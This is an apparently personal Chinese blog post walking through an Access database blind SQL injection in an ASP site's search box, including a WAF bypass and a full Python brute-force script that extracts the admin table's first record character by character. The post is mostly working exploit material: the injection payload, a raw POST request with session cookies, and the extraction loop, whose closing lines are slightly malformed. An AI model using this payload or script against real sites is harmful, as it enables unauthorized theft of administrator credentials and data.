一个有梦想的少年。

一次access盲注漏洞复现学习(附脚本)

迟来的新年快乐 好久没写东西  也没干货可写 太菜了

由于平时碰到的access的注入点比较少 也没认真学习过access注入 印象中除了偏移注入 其他都是需要爆破表名和字段名 看到个payload不需要字段名 遂研究下

Payload:asdf' or asc(mid((select a from(select 1,2,3 as a,4,5,6 from admin where 1=2 union select top 1 * from admin)ss),{},1))={} or 'a'='a

注入点位置在搜索框

有WTS waf


空格换成+就绕过去了

直接看payload

Payload通过闭合 用or实现条件为假 可控 假

直接看子查询select+1,2,3+as+a,4,5,6+from+admin+where+1=2+union+select+top+1+*+from+admin

本地尝试复现

select 1,2,3 as a from admin where 1=2 union select top 1 * from admin



执行后第3行的字段会以字段名为a返回 由于where 1=2为假 所以前面的没有返回 返回的是 select top 1 * from admin的结果

这样就好理解了

select a from (select 1,2 ,3 as a from admin where 1=2 union select top 1 * from admin)

就等价于select a from 刚刚的结果集



接着就是通过mid和asc进行盲注了 

通过编写脚本一下就跑出来了如需跑其他字段将as a放入别的字段位置就行了

脚本

#coding=utf-8

import hackhttp

url = "https://xxx/webasp/ly.asp"

proxy = {'http':'https://127.0.0.1:8080'}

user = ''

hh=hackhttp.hackhttp()

for i in range(1,33):

    for j in range(43,126):

        raw_data = '''POST /webasp/ly.asp HTTP/1.1

Host: www.xxx.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 141

Origin: https://xxx.com

Connection: close

Referer: https://xxx.com/webasp/ly.asp

Cookie: bdshare_firstime=1613967788392; Hm_lvt_31533bb09acca10f4010ef9ed32e309e=1613967789,1614151209; config=; ASPSESSIONIDSCDCDDBQ=KOOFBPPCOPOMAJMGAONKHPJO; Hm_lpvt_31533bb09acca10f4010ef9ed32e309e=1614151993; ASPSESSIONIDQAADBDCR=FFDJJAADBHINHDLIIAKCDJBH

Upgrade-Insecure-Requests: 1

 

keywords=asdf'+or+asc(mid((select+a+from+(select+1,2,3+as+a,4,5,6+from+admin+where+1=2+union+select+top+1+*+from+admin)ss),{},1))={}+or+'a'='a

'''.format(i, j)

        code, head, html, redirect_url, log = hh.http(url=url,raw=raw_data,proxy=('127.0.0.1', 8080))

        if '2015' in html:

            user+=chr(j)

print(user)

            Break

使用request库payload会被url编码 所以选择了hackhttp库


 

评论

© Goodboy|Powered by LOFTER